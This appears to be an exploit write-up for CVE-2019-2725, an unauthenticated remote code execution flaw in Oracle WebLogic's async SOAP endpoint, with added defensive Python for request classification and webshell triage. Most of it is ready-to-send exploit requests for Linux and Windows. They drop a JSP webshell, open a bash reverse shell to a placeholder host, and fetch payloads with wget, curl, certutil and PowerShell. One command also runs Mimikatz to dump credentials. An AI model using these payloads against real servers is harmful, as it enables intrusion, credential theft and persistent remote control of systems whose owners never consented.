
(CVE-2019-2725)(CNVD-C-2019-48814)

1. Vulnerability overview

Oracle WebLogic Server ships the wls9_async_response component, whose AsyncResponseService endpoint (/_async/AsyncResponseService) accepts SOAP requests without authentication. WebLogic hands the WorkContext element of an incoming SOAP header to java.beans.XMLDecoder, which instantiates whatever classes the XML names and calls whatever methods it lists, so a crafted request runs arbitrary code as the WebLogic process user. Oracle's alert names the wls-wsat component as affected by the same defect. Oracle published an out-of-band Security Alert with patches on 26 April 2019; where the patch cannot be applied at once, the usual mitigation is to delete wls9_async_response.war and wls-wsat.war and restart, or to deny access to /_async/* and /wls-wsat/* at the server or the reverse proxy in front of it.

2. Affected versions

Oracle WebLogic Server 10.x (10.3.6.0.0 in Oracle's alert)

Oracle WebLogic Server 12.1.3

3. Reproduction

Visit http://www.0-sec.org/_async/AsyncResponseService

If the service answers (the original page showed a screenshot of the response here), the vulnerable component is deployed and the server may be exploitable; only the requests below prove it.

Win/Linux universal shell-write payload (1)

Two notes on the captures that follow. Every Content-Length is the value recorded when the payloads were captured, so let your client recompute it for the body you actually send. Payloads (1) and (2) use `<object class="java.io.PrintWriter">`, the CVE-2017-10271-era shape; Oracle's October 2017 fix for that CVE already rejects the object element, so on a server that has that fix but lacks the CVE-2019-2725 fix you need the `<void class="java.lang.ProcessBuilder">` payloads further down.

```
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1142
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string><void method="println"><string><![CDATA[
<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[1024];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
    %>]]>
</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
```

After sending it, visit

http://www.0-sec.org/_async/webshell.jsp?pwd=123&cmd=whoami
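The detection side of the request above, as an added example that is not part of the original write-up: a Python classifier for the SOAP body a WAF, reverse proxy or IDS sees on POSTs to the vulnerable paths. It parses the WorkContext header and flags the XMLDecoder gadget classes this page's payloads use (java.lang.ProcessBuilder and java.io.PrintWriter), returning the command lines and file paths inside for triage. The sample bodies are constructed from the payload shapes on this page, not captured traffic; the /wls-wsat/ prefix is included because Oracle's alert names that component alongside wls9_async_response.

```python
"""Classify POST bodies sent to WebLogic's wls9_async_response / wls-wsat endpoints
for CVE-2019-2725-style XMLDecoder gadgets in the WorkContext SOAP header.
Added example for this write-up; sample bodies are constructed, not captured."""
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"

# URL prefixes of the two components Oracle's alert names for CVE-2019-2725.
VULN_PATH_PREFIXES = ("/_async/", "/wls-wsat/")

# Gadget classes used by the payloads on this page; add others as you meet them.
GADGET_CLASSES = {"java.lang.ProcessBuilder", "java.io.PrintWriter"}

# XMLDecoder elements that instantiate classes or invoke methods.
XMLDECODER_ELEMENTS = {"object", "void", "new", "method", "class", "array"}


def inspect_request(method, path, body):
    """Return {'verdict', 'classes', 'strings'} for one HTTP request.

    verdict: 'benign'      not a POST to a vulnerable path, or no WorkContext header
             'unparseable' POST to a vulnerable path whose body is not well-formed XML
             'suspicious'  WorkContext carries XMLDecoder instantiation/invocation markup
             'exploit'     a known gadget class appears
    'strings' collects every <string> value inside WorkContext (command lines,
    target file paths, the JSP source itself) for the analyst.
    """
    result = {"verdict": "benign", "classes": [], "strings": []}
    if method.upper() != "POST" or not path.startswith(VULN_PATH_PREFIXES):
        return result
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        result["verdict"] = "unparseable"
        return result
    header = root.find(f"{{{SOAP_NS}}}Header")
    if header is None:
        return result
    for ctx in header.iter(f"{{{WORKAREA_NS}}}WorkContext"):
        for el in ctx.iter():
            if el.tag in XMLDECODER_ELEMENTS and result["verdict"] == "benign":
                result["verdict"] = "suspicious"
            cls = el.get("class")
            if cls:
                result["classes"].append(cls)
                if cls in GADGET_CLASSES:
                    result["verdict"] = "exploit"
            if el.tag == "string" and el.text:
                result["strings"].append(el.text.strip())
    return result


def _envelope(work_context_inner):
    """Wrap XMLDecoder markup in the SOAP envelope shape used by the page's payloads."""
    return (
        f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}" '
        'xmlns:wsa="http://www.w3.org/2005/08/addressing" '
        'xmlns:asy="http://www.bea.com/async/AsyncResponseService">'
        "<soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo>"
        f'<work:WorkContext xmlns:work="{WORKAREA_NS}">{work_context_inner}</work:WorkContext>'
        "</soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>"
    )


# Constructed samples mirroring the page's two payload shapes.
REVERSE_SHELL_BODY = _envelope(
    '<void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3">'
    '<void index="0"><string>/bin/bash</string></void>'
    '<void index="1"><string>-c</string></void>'
    '<void index="2"><string>bash -i &gt;&amp; /dev/tcp/vpsip/vpsport 0&gt;&amp;1</string></void>'
    '</array><void method="start"/></void>'
)
FILE_WRITE_BODY = _envelope(
    '<java version="1.8.0_131" class="java.beans.xmlDecoder">'
    '<object class="java.io.PrintWriter">'
    "<string>servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>"
    '<void method="println"><string><![CDATA[<% out.print("constructed"); %>]]></string></void>'
    '<void method="close"/></object></java>'
)
# A request whose WorkContext is empty, for comparison.
EMPTY_CONTEXT_BODY = _envelope("")


def demo():
    """Run the classifier over the constructed samples; returns {name: verdict}."""
    cases = {
        "reverse_shell": ("POST", "/_async/AsyncResponseService", REVERSE_SHELL_BODY),
        "file_write": ("POST", "/_async/AsyncResponseService", FILE_WRITE_BODY),
        "empty_context": ("POST", "/_async/AsyncResponseService", EMPTY_CONTEXT_BODY),
        "probe_get": ("GET", "/_async/AsyncResponseService", ""),
        "garbage": ("POST", "/wls-wsat/CoordinatorPortType", "not xml"),
        "other_path": ("POST", "/console/login/LoginForm.jsp", REVERSE_SHELL_BODY),
    }
    return {name: inspect_request(*req)["verdict"] for name, req in cases.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:14s} {verdict}")
```

The "suspicious" verdict fires on any XMLDecoder instantiation markup inside WorkContext, which needs tuning if your applications genuinely propagate WorkContext data between servers; "exploit" is the one to alert on unconditionally, and the collected strings give the responder the command line or dropped-file path without decoding the request by hand.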

Win/Linux universal shell-write payload (2)

```
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1136
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp</string><void method="println"><string><![CDATA[
<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[1024];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
    %>]]>
</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
```

After sending it, visit

http://www.0-sec.org/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

(Note: servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/ and servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/ in the requests above are the default paths. They are relative to the directory the server was started from, normally the domain home, and AdminServer is the default server name. If the target's paths differ, get a reverse shell first and locate the exploded war directories from there.)

Linux

  • Reverse shell

```
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 853
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/vpsip/vpsport 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```

-   Write a webshell (needs an internet-reachable host) // two variants

> Host a webshell.txt containing the JSP above on a server the target can reach.
>
> Webshell address: <http://www.0-sec.org/_async/webshell.jsp>

```
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```

```
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>curl http://vpsip:vpsport/webshell.txt -o servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```

-   Write a webshell (no external host needed) // two variants

Both variants echo the base64-encoded webshell.jsp into base64 -d. The string itself is omitted from the first variant (BASE64_OF_WEBSHELL_JSP marks where it goes) and written out in full in the second; it decodes to the same pwd=123 JSP as in the first section.

```
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.50.219:7001
Content-Length: 1378
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo BASE64_OF_WEBSHELL_JSP |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```

The webshell is then at: http://www.0-sec.org/_async/webshell.jsp?pwd=123&cmd=whoami

```
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.50.219:7001
Content-Length: 1376
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```

The webshell is then at: http://www.0-sec.org/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

Win

  • Reverse shell

Generate a payload.ps1 PowerShell script with Cobalt Strike, host it on a server the target can reach, then send the request below. The command string is the original write-up's and, after loading the script, also calls Invoke-Mimikatz -DumpCreds; trim it to what you actually need.

```
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 861
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1'); Invoke-Mimikatz -DumpCreds"</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```
  • Write a webshell (needs an internet-reachable host) // two variants

Host a webshell.txt containing the JSP above on a server the target can reach.

Webshell address: http://www.0-sec.org/_async/webshell.jsp

```
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:port/webshell.txt','servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp')</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```

```
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>certutil -urlcache -split -f http://ip:port/webshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```
  • Write a webshell (no external host needed) // four variants

First pair: echo the base64 text into webshell.txt, then decode it into webshell.jsp with certutil. BASE64_OF_WEBSHELL_JSP stands for the same base64 string as in the Linux section (written out in full in the second Linux variant).

```
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1367
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>echo BASE64_OF_WEBSHELL_JSP  > servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\webshell.txt</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```

```
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 913
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>certutil -decode servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\webshell.txt servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```

The webshell for this pair is at: http://www.0-sec.org/_async/webshell.jsp?pwd=123&cmd=whoami

Second pair: the same two steps against the bea_wls_internal path.

```
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1367
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>echo BASE64_OF_WEBSHELL_JSP  > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.txt</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```

```
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 913
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>certutil -decode servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```

The webshell for this pair is at: http://www.0-sec.org/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami
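Host-side triage for the webshell drops above, as an added example that is not part of the original write-up. Every payload on this page writes under servers/<server>/tmp/_WL_internal/<app>/<hash>/war/, and the page gives the context roots those two apps answer on (/_async for bea_wls9_async_response, /bea_wls_internal for bea_wls_internal); the code lists JSPs in those directories, maps each back to the URL it is served from, and pulls the exploit POSTs and webshell GETs out of an access log. The domain tree it builds and the access-log lines are constructed for the demo; the response codes in them are illustrative.

```python
"""Host-side triage after a CVE-2019-2725 webshell drop: list JSP files under the
exploded internal webapps the payloads on this page write into, map each back to
the URL it is served from, and pull exploit traffic out of an access log.
Added example for this write-up; the domain tree and log lines are constructed."""
import re
import tempfile
from pathlib import Path

# Every payload above writes below <DOMAIN_HOME>/servers/<server>/tmp/_WL_internal/<app>/<hash>/war/.
DROP_GLOB = "servers/*/tmp/_WL_internal/*/*/war/**/*.jsp"

# Context roots the page gives for the two internal apps it drops into.
CONTEXT_ROOTS = {
    "bea_wls9_async_response": "/_async",
    "bea_wls_internal": "/bea_wls_internal",
}

# WebLogic's access.log is common log format by default; the request line is enough
# to spot both the exploit POSTs and later GETs of a dropped JSP under those roots.
EXPLOIT_TRAFFIC_RE = re.compile(
    r'"(?:POST /(?:_async|wls-wsat)/|GET /(?:_async|bea_wls_internal)/[^\s?]*\.jsp)'
)


def find_dropped_jsps(domain_home):
    """Return domain-relative POSIX paths of every .jsp under the internal war directories."""
    root = Path(domain_home)
    return sorted(p.relative_to(root).as_posix() for p in root.glob(DROP_GLOB) if p.is_file())


def served_url(rel_path):
    """Map a dropped file's domain-relative path to the URL it answers on, or None."""
    parts = Path(rel_path).parts
    # servers/<server>/tmp/_WL_internal/<app>/<hash>/war/<file...>
    if len(parts) < 8 or parts[0] != "servers" or parts[3] != "_WL_internal" or parts[6] != "war":
        return None
    context = CONTEXT_ROOTS.get(parts[4])
    return None if context is None else context + "/" + "/".join(parts[7:])


def exploit_traffic(access_log_lines):
    """Return the access-log lines whose request line matches the exploit or shell access."""
    return [line for line in access_log_lines if EXPLOIT_TRAFFIC_RE.search(line)]


# Constructed access-log excerpt: the probe, the exploit POST, the shell call,
# a POST to the wls-wsat component and an unrelated console request.
SAMPLE_ACCESS_LOG = [
    '192.168.50.1 - - [26/Apr/2019:10:15:02 +0800] "GET /_async/AsyncResponseService HTTP/1.1" 200 1532',
    '192.168.50.1 - - [26/Apr/2019:10:15:09 +0800] "POST /_async/AsyncResponseService HTTP/1.1" 202 0',
    '192.168.50.1 - - [26/Apr/2019:10:15:20 +0800] "GET /_async/webshell.jsp?pwd=123&cmd=whoami HTTP/1.1" 200 64',
    '192.168.50.1 - - [26/Apr/2019:10:16:01 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 0',
    '10.0.0.7 - - [26/Apr/2019:10:16:30 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 8012',
]


def demo_triage():
    """Build a throw-away domain tree with one dropped shell and run all three checks."""
    with tempfile.TemporaryDirectory() as tmp:
        war = Path(tmp, "servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war")
        war.mkdir(parents=True)
        (war / "webshell.jsp").write_text("<% /* constructed */ %>")
        # A JSP belonging to a user application outside _WL_internal must not show up.
        other = Path(tmp, "servers/AdminServer/tmp/_WL_user/myapp/abc/war")
        other.mkdir(parents=True)
        (other / "index.jsp").write_text("<% %>")
        dropped = find_dropped_jsps(tmp)
        return dropped, [served_url(d) for d in dropped], exploit_traffic(SAMPLE_ACCESS_LOG)


if __name__ == "__main__":
    dropped, urls, hits = demo_triage()
    for path, url in zip(dropped, urls):
        print(f"dropped: {path} -> {url}")
    for line in hits:
        print("exploit traffic:", line)
```

Run find_dropped_jsps against the real domain home and compare the list with a clean install of the same patch level before deleting anything; served_url tells you which URL to block at the proxy while the file is removed and the wars are patched or deleted.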

Automated script

https://github.com/ianxtianxt/CVE-2019-2725

cve2019-2725_weblogic_rce.bat http://192.168.31.5:7001 "cat /etc/passwd"

References

https://mp.weixin.qq.com/s?__biz=MzA3NjU5MTIxMg==&mid=2650560530&idx=1&sn=86f5e0811c003c71965a4fc088f18100&chksm=87560111b02188071b9a60a36316b931770b0ed58b02b63d2d2428a5120d6809030d94031589&scene=21#wechat_redirect